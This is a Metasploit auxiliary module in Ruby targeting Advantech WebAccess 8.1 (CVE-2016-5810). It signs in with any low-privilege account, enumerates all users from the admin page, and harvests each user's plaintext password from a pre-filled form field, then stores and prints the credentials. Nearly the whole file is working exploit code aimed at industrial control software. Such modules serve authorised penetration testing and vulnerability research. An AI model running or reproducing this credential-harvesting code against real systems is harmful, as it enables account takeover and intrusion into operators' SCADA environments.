##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
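class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Anchor href on AdminPg.asp that points at a single user's detail page;
  # the capture is the (URI-encoded) username.
  USER_LINK_RE = %r{broadWeb/user/upAdminPg\.asp\?uname=(.+)}.freeze

  # Session cookie WebAccess issues after a successful sign-in.
  SESSION_COOKIE_RE = /ASPSESSIONID\w+=\w+/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
        'Description' => %q{
          This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
          Although authentication is required, any level of user permission can exploit this vulnerability.

          Note that 8.2 is not suitable for this.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
          'sinn3r', # Metasploit module
        ],
        'References' => [
          ['CVE', '2016-5810'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
        ],
        'DisclosureDate' => '2017-01-21',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
      ]
    )
  end

  # Signs in to WebAccess with WEBACCESSUSER / WEBACCESSPASS.
  #
  # A successful login is recognised by the redirect to /broadweb/bwproj.asp;
  # the working credential is then stored via #report_cred.
  #
  # @return [String, nil] the ASPSESSIONID cookie ("name=value") on success,
  #   an empty string when the server redirected but issued no session cookie,
  #   or nil when the login was rejected
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not answer
  def do_login
    user = datastore['WEBACCESSUSER']
    pass = datastore['WEBACCESSPASS']
    # The password is only echoed at verbose level.
    vprint_status("Attempting to login as '#{user}:#{pass}'")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp'),
      'vars_post' => {
        'page' => '/',
        'pos' => '',
        'username' => user,
        'password' => pass,
        'remMe' => '',
        'submit1' => 'Login'
      }
    )

    fail_with(Failure::Unreachable, 'Connection timed out while trying to login') unless res

    unless res.headers['Location'] == '/broadweb/bwproj.asp'
      print_error("Unable to login as '#{user}:#{pass}'")
      return nil
    end

    print_good("Logged in as #{user}")
    report_cred(
      user: user,
      password: pass,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    )

    # String#[] with a regexp returns the first match or nil.
    res.get_cookies[SESSION_COOKIE_RE] || ''
  end

  # Fetches one user's detail page (upAdminPg.asp) and reads the value the
  # server pre-fills into the "Password" input.
  #
  # @param sid [String] session cookie returned by #do_login
  # @param user [String] username as listed on AdminPg.asp
  # @return [String, nil] the password value, or nil when the request times out
  #   or the page has no Password input / no value attribute on it
  def get_user_cred_detail(sid, user)
    vprint_status("Gathering password for user: #{user}")

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp'),
      'cookie' => sid,
      'vars_get' => { 'uname' => user }
    )

    unless res
      print_error("Unable to gather password for user #{user} due to a connection timeout")
      return nil
    end

    pass_field = res.get_html_document.at('input[@name="Password"]')
    # Element#[] yields nil for a missing attribute, whereas
    # attributes['value'].text would raise NoMethodError.
    pass_field ? pass_field['value'] : nil
  end

  # Lists the usernames linked from the user administration page (AdminPg.asp).
  #
  # @param sid [String] session cookie returned by #do_login
  # @return [Array<String>] unique, URI-decoded usernames (may be empty)
  # @raise [Msf::Exploit::Failed] via fail_with when the server does not answer
  def get_users_page(sid)
    vprint_status("Checking user page...")

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp'),
      'cookie' => sid
    )

    fail_with(Failure::Unreachable, 'Connection timed out while checking AdminPg.asp') unless res

    html = res.get_html_document
    users = html.search('a').map do |anchor|
      # Anchors without an href would otherwise blow up on nil.
      match = anchor['href'].to_s.match(USER_LINK_RE)
      match ? Rex::Text.uri_decode(match[1]) : nil
    end

    # Each user is fetched once; duplicate links are common on list pages.
    users.compact.reject(&:blank?).uniq
  end

  # Stores a credential (and a login record for it) in the database.
  #
  # @param opts [Hash] :user, :password, :status
  #   (a Metasploit::Model::Login::Status constant) and optional :proof
  # @return [Object] whatever create_credential_login returns
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: 'webaccess',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: opts[:status],
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Logs in, enumerates users, and reports each password found.
  #
  # Stops with fail_with when the login is rejected or yields no session
  # cookie, since every later request depends on that cookie.
  def run
    cookie = do_login
    fail_with(Failure::NoAccess, "Login as '#{datastore['WEBACCESSUSER']}' was rejected") if cookie.nil?
    fail_with(Failure::UnexpectedReply, 'Login succeeded but no ASPSESSIONID cookie was returned') if cookie.empty?

    users = get_users_page(cookie)
    if users.empty?
      print_status('No user links found on AdminPg.asp')
      return
    end

    users.each do |user|
      pass = get_user_cred_detail(cookie, user)
      # An empty string is a real (blank) password and is still reported.
      next unless pass

      report_cred(
        user: user,
        password: pass,
        status: Metasploit::Model::Login::Status::SUCCESSFUL,
        proof: 'AdminPg.asp'
      )
      print_good("Found password: #{user}:#{pass}")
    end
  end
end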